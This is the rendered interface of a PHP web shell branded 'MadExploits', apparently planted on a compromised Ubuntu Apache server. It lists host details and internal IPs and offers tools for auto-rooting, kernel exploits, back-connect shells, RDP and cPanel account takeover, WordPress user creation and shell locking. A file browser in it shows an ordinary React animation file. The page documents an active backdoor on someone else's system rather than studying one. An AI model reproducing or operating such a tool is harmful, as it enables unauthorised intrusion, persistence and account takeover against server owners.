Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
react-smooth /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Animate.js
8.24
KB
-rw-r--r--
AnimateGroup.js
963
B
-rw-r--r--
AnimateGroupChild.js
2.02
KB
-rw-r--r--
AnimateManager.js
1.07
KB
-rw-r--r--
configUpdate.js
3.04
KB
-rw-r--r--
easing.js
4.01
KB
-rw-r--r--
index.js
210
B
-rw-r--r--
setRafTimeout.js
496
B
-rw-r--r--
util.js
2.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setRafTimeout.js
function safeRequestAnimationFrame(callback) { if (typeof requestAnimationFrame !== 'undefined') requestAnimationFrame(callback); } export default function setRafTimeout(callback, timeout = 0) { let currTime = -1; const shouldUpdate = now => { if (currTime < 0) { currTime = now; } if (now - currTime > timeout) { callback(now); currTime = -1; } else { safeRequestAnimationFrame(shouldUpdate); } }; requestAnimationFrame(shouldUpdate); }
Close